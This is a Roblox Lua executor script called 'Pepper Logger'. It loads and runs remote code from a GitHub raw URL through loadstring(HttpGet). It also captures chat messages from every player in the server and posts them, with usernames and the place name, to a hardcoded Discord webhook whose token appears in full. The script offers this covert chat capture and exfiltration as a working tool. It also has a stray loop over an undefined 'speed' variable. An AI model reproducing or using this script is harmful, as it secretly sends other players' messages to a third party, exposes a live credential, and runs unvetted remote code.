local peppermints = loadstring(game:HttpGet("https://raw.githubusercontent.com/Peppermintsaregood/pepperthinger/main/loadthis"))()


local ScreenGui = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Template = Instance.new("TextButton")
local ScrollingFrame = Instance.new("ScrollingFrame")
local UIListLayout = Instance.new("UIListLayout")
local TextBox = Instance.new("TextBox")
local TextButton = Instance.new("TextButton")
local open = true
local discord = true
local httpService = game:GetService("HttpService")
local webhook_url = "https://discord.com/api/webhooks/1141139836636500118/zy_MIWb9565dJbx0DnFk1B--axvIcrp-ZXebYQVhFSxNcoPf1yywxeIu3tCJLbBn95c1"
--Properties:
 local response = request(
            {
                Url = webhook_url,
                Method = "POST",
                Headers = {
                    ['Content-Type'] = 'application/json',

                },
                Body = httpService:JSONEncode({
                    ["content"] = "",
                    ["embeds"] = {{
                        ["title"] = "Chatlogs started",
                        ["description"] = "*CHAT LOGS STARTED IN "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.." by "..game.Players.LocalPlayer.DisplayName.."*",
                        ["type"] = "rich"
                    }}
                })
            }
        )
ScreenGui.Parent = game.CoreGui

Main.Name = "Main"
Main.Parent = ScreenGui
Main.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
Main.BorderColor3 = Color3.fromRGB(0, 0, 0)
Main.BorderSizePixel = 0
Main.Position = UDim2.new(0.235504657, 0, 0.342759341, 0)
Main.Size = UDim2.new(0, 458, 0, 344)
Main.Active = true
Main.Draggable = true


Frame.Parent = Main
Frame.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(-0.000257866865, 0, -5.51800404e-05, 0)
Frame.Size = UDim2.new(0, 458, 0, 28)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Size = UDim2.new(1, 0, 1, 0)
TextLabel.Font = Enum.Font.Oswald
TextLabel.Text = "Pepper Logger"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

Template.Name = "Template"
Template.Parent = Frame
Template.BackgroundColor3 = Color3.fromRGB(67, 67, 67)
Template.BorderColor3 = Color3.fromRGB(0, 0, 0)
Template.BorderSizePixel = 0
Template.Position = UDim2.new(0.260191858, 0, -2.39353568e-07, 0)
Template.Size = UDim2.new(0, 338, 0, 50)
Template.Visible = false
Template.Font = Enum.Font.Gotham
Template.Text = "gone"
Template.TextColor3 = Color3.fromRGB(255, 255, 255)
Template.TextScaled = true
Template.TextSize = 14.000
Template.TextWrapped = true

ScrollingFrame.Parent = Main
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame.BorderSizePixel = 0
ScrollingFrame.Position = UDim2.new(0.0436681211, 0, 0.215061098, 0)
ScrollingFrame.Size = UDim2.new(0, 417, 0, 255)
ScrollingFrame.CanvasSize = UDim2.new(0, 0, 20, 0)

UIListLayout.Parent = ScrollingFrame
UIListLayout.VerticalAlignment = Enum.VerticalAlignment.Top
UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center
UIListLayout.Padding = UDim.new(0, 20)

TextBox.Parent = Main
TextBox.BackgroundColor3 = Color3.fromRGB(33, 33, 33)
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Position = UDim2.new(0.205240175, 0, 0.0813401714, 0)
TextBox.Size = UDim2.new(0, 269, 0, 46)
TextBox.Font = Enum.Font.SourceSans
TextBox.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
TextBox.PlaceholderText = "search items here"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextButton.Parent = Main
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.923580766, 0, -0.00290697673, 0)
TextButton.Size = UDim2.new(0, 34, 0, 28)
TextButton.Font = Enum.Font.FredokaOne
TextButton.Text = "-"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

function createItem(text, user)
    if user == game.Players.LocalPlayer.Name then
 local response = request(
            {
                Url = webhook_url,
                Method = "POST",
                Headers = {
                    ['Content-Type'] = 'application/json',

                },
                Body = httpService:JSONEncode({
                    ["content"] = "**"..user.." - "..text.."**"
                })
            }
        )
    else
     local response = request(
            {
                Url = webhook_url,
                Method = "POST",
                Headers = {
                    ['Content-Type'] = 'application/json',

                },
                Body = httpService:JSONEncode({
                    ["content"] = user.." - "..text
                })
            }
        )
    end
    local item = Template:Clone()
    for v, i in pairs(ScrollingFrame:GetChildren()) do
        i.Parent = TextBox
    end

    item.Parent = ScrollingFrame
    item.Text = user.." - '"..text.."'"
    if TextBox.Text ~= "" then
        if not string.find(string.lower(item.Text), string.lower(TextBox.Text)) then
            item.Visible = false
        else
            item.Visible = true
        end
    else
        item.Visible = true
    end
    
    

    for v, i in pairs(TextBox:GetChildren()) do
        i.Parent = ScrollingFrame
    end
    item.MouseButton1Click:Connect(function()
        TextBox.Text = user
    end)
end
function search(text)
    for _, item in pairs(ScrollingFrame:GetChildren()) do
        if text ~= "" then
            if not string.find(string.lower(item.Text), string.lower(text)) then
                item.Visible = false
            end
        else
            item.Visible = true
        end
    end
end
TextButton.MouseButton1Click:Connect(function()
    if open == false then
        open = true
        Main:TweenPosition(UDim2.new(0, 0,0.558, 0), Enum.EasingDirection.Out, Enum.EasingStyle.Quad, 1, true)
    else
        open = false
        Main:TweenPosition(UDim2.new(0, 0,0.967, 0), Enum.EasingDirection.Out, Enum.EasingStyle.Quad, 1, true)  
    end
end)



peppermints.logChat(function(plr, msg)
    if plr == game.Players.LocalPlayer then
       createItem(msg, plr.Name)
    end
end)
for v, i in pairs(game.Players:GetChildren()) do
    i.Chatted:connect(function(msg)
        if i.Name ~= game.Players.LocalPlayer.Name then
            createItem(msg, i.Name)
        end
    end)
end     
game.Players.PlayerAdded:Connect(function(i)
    if i.Name ~= game.Players.LocalPlayer.Name then
        i.Chatted:connect(function(msg)
       createItem(msg, i.Name)
        end)
    end
end)   

TextBox:GetPropertyChangedSignal("Text"):Connect(function()
    search(TextBox.Text)
end)
while wait(speed) do
    switch = not switch
end
game.Players.PlayerRemoving:connect(function(plr)
    if plr == game.Players.LocalPlayer then
         local response = request(
            {
                Url = webhook_url,
                Method = "POST",
                Headers = {
                    ['Content-Type'] = 'application/json',

                },
                Body = httpService:JSONEncode({
                    ["content"] = "",
                    ["embeds"] = {{
                        ["title"] = "Chatlogs Ended",
                        ["description"] = "*CHAT LOGS ENDED IN "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.." by "..game.Players.LocalPlayer.DisplayName.."*",
                        ["type"] = "rich"
                    }}
                })
            }
        )
    end
end)
